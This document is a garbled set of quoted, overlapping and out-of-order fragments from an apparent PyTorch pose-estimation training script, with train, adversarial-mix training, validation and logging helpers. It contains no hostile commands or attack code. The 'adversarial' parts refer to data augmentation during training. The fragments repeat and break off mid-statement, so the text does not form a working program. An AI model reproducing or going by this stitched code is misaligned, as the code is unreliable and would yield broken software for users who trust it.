full_arch_name): names = name_value.keys() values", "output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for", "tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc =", "output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap for higher", "all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list):", "gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record", "maxvals # double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:,", "from __future__ import division from __future__ import print_function import time import logging import", "time_gpu = 0. for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not", "tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0])", "+= inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm", "def update(self, val, n=1): self.val = val self.sum += val * n self.count", "n=1): self.val = val self.sum += val * n self.count += n self.avg", "= meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c,", "idx = 0 feat_dict = {} with torch.no_grad(): end = time.time() time_gpu =", "as F logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch,", "1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx += num_images if i", "for list_index in range(1, len(inputs)): tmp += inputs[list_index] * 
mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach())", "writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar(", "def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values = len(name_value) logger.info(", "infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output", "target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute", "self.sum = 0 self.count = 0 def update(self, val, n=1): self.val = val", "self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count", "preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals # double check", "> 15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name +", "compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and", "args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time()", "end = time.time() time_gpu = 0. for i, (input, target, target_weight, meta) in", "writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta,", "name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps", "= model[1].train() else: model.train() end = time.time() for i, (input, target, target_weight, meta)", "+ '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' 
logger.info( '|", "# mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for", "else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap for", "writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list):", "models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time() for", "from __future__ import absolute_import from __future__ import division from __future__ import print_function import", "len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps']", "0 self.avg = 0 self.sum = 0 self.count = 0 def update(self, val,", "logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred", "loss_D.backward() optimizer.step() # G: compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad()", "= criterion(outputs, target, target_weight) # compute gradient and do update step optimizer.zero_grad() loss.backward()", "else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time() for i,", "target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs,", "optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G = -criterion(output, target, target_weight) *", "AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model, list): model = model[0].train()", "end) end = time.time() # corresponding center scale joint c = meta['center'].numpy() s", ") else: writer.add_scalars( 'valid', dict(name_values), global_steps ) 
writer_dict['valid_global_steps'] = global_steps + 1 return", "acc = AverageMeter() if isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher", "args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do", ") save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix) print('=> The average", "(output + output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm =", "models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time() for i, (inputs,", "6)) image_path = [] filenames = [] imgnums = [] idx = 0", "def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count =", "prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def", "= {} with torch.no_grad(): end = time.time() time_gpu = 0. for i, (input,", "outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped", "import time import logging import os, copy import numpy as np import torch", "save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix) print('=> The average inference", "output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped =", "torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap", "flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) #", "double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx", "accuracy and record loss 
losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target,", "= global_steps + 1 return name_values, perf_indicator # markdown format output def _print_name_value(name_value,", "0 def update(self, val, n=1): self.val = val self.sum += val * n", "AverageMeter() if isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval()", "AverageMeter() # switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros(", "target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images =", "4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx +=", "1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix", "model.train() end = time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time()", "\\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg)", "1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped) *", "inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds,", "in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch,", "in names]) + ' |' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name)", "else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if", "0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] =", "len(val_loader)) name_values, perf_indicator = 
val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums )", "time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) #", "= criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm *", "= AverageMeter() # switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds =", "s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images,", "time.time() if i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time", "{acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer =", "meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images,", "{}'.format(name) for name in names]) + ' |' ) logger.info('|---' * (num_values+1) +", "for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel", "args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc,", "__future__ import absolute_import from __future__ import division from __future__ import print_function import time", "model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end =", "= len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples,", "= [] imgnums = [] idx = 0 feat_dict = {} with torch.no_grad():", "dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps +", 
"model[0].train() model_D = model[1].train() else: model.train() end = time.time() for i, (input, target,", "dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1)", "record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config)", "input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred", "criterion(outputs, target, target_weight) # compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step()", "= model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D", "import print_function import time import logging import os, copy import numpy as np", "------------------------------------------------------------------------------ # Copyright (c) Microsoft # Licensed under the MIT License. 
# Written", "accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target,", "# measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred =", "5] = score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ == 0:", "'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time,", "input = input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input)", "tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start =", "= 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data", "_, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc,", "outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i", "G: compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp)", "cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() #", "score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx", "'.join(['| {}'.format(name) for name in names]) + ' |' ) logger.info('|---' * (num_values+1)", "record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config)", "writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator # markdown format output def", "name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), 
global_steps ) writer_dict['valid_global_steps']", "in nets: if net is not None: for param in net.parameters(): param.requires_grad =", "= time.time() if i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\", "0:-1] output = (output + output_flipped) * 0.5 if not cpu: target =", "tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as nn", "cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time()", "accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end", "# compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end = time.time()", "= np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx += num_images", "target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0))", "end) end = time.time() if i % config.PRINT_FREQ == 0: msg = 'Epoch:", "' + ' '.join(['| {}'.format(name) for name in names]) + ' |' )", "pred * 4, output, prefix) print('=> The average inference time is :', time_gpu", "writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps']", "AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\" def __init__(self): self.reset() def", "inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time()", "* (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute", "not cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start = 
time.time() outputs", "time.time() # corresponding center scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score", "= target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight)", "config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values,", "avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end)", "AverageMeter() if isinstance(model, list): model = model[0].train() model_D = model[1].train() else: model.train() end", "i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps =", "0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True)", "msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\", "__init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0", "logger.info( '| ' + full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for", "acc = AverageMeter() if isinstance(model, list): model = model[0].train() model_D = model[1].train() else:", "len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6))", "def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets] for net in", "args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time", "# double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2]", "os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred * 4, 
output, prefix)", "if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True)", "Licensed under the MIT License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from", "optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred", "= criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy and record loss", "names = name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '| Arch '", "len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for name in names])", "return name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys()", "(<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from __future__", "model[1].train() else: model.train() end = time.time() for i, (input, target, target_weight, meta) in", "outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss", "= optimizers[1] end = time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)):", "copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir,", "name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '| Arch ' + '", "'_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset,", "- end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs =", "for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if 
not cpu: input =", "filenames = [] imgnums = [] idx = 0 feat_dict = {} with", "writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc',", "meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight =", "0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target =", "i ) save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix) print('=> The", "= outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu:", "global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4,", "val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature", "def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time =", "cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs =", "all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value", "batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss',", "optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses =", "switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS,", "> 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target", 
"= time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end)", "if not isinstance(nets, list): nets = [nets] for net in nets: if net", "losses = AverageMeter() acc = AverageMeter() if isinstance(models, list): model = models[0].train() model_G", "# G: compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs =", "avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt)", "not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not", "model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar(", "writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix", "tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion,", "batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch to evaluate", ":, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output = (output +", "= writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] =", "AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch to evaluate mode model.eval()", "target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) #", "not aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :,", 
"losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output =", "({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t'", "mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 )", "num_images, 5] = score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ ==", "= name_value.values() num_values = len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name)", "= [nets] for net in nets: if net is not None: for param", "all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums = []", "= logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict):", "prefix) print('=> The average inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator", "self.avg = 0 self.sum = 0 self.count = 0 def update(self, val, n=1):", "models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end", "acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm,", "inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as nn from tqdm", "'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f}", "pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() -", "\\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format(", "optimizer.zero_grad() loss.backward() 
optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc,", "target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end =", "= writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1", "= AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch to evaluate mode", "= model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped", "= score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ == 0: msg", "time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs", "= input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped", "= target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1)", "'val'), i ) save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix) print('=>", "i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input)", "= accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end)", ":', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path,", "set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G = -criterion(output, target,", "model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, 
target, target_weight) loss_D_kd =", "output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter()", "0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] =", "save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model,", "writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator", "avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt)", "import logging import os, copy import numpy as np import torch from core.evaluate", "target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(),", "config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss", "torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer,", "loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do update step", "tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target", "image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in", "model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes", "torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1] else:", "= config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values,", "prefix) def 
set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets] for net", "3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames = []", "output = outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() #", "for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0]", "= inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad()", "output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu", "tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index]", "loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc',", "__future__ import print_function import time import logging import os, copy import numpy as", "division from __future__ import print_function import time import logging import os, copy import", "do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(),", "loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt,", "preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :,", "'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader),", "loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, 
avg_acc, cnt,", "__future__ import division from __future__ import print_function import time import logging import os,", "if net is not None: for param in net.parameters(): param.requires_grad = requires_grad def", "teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight)", "num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx", "os, copy import numpy as np import torch from core.evaluate import accuracy from", "global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1", "+= (infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1] else: output =", "data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps)", "train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter()", "core.evaluate import accuracy 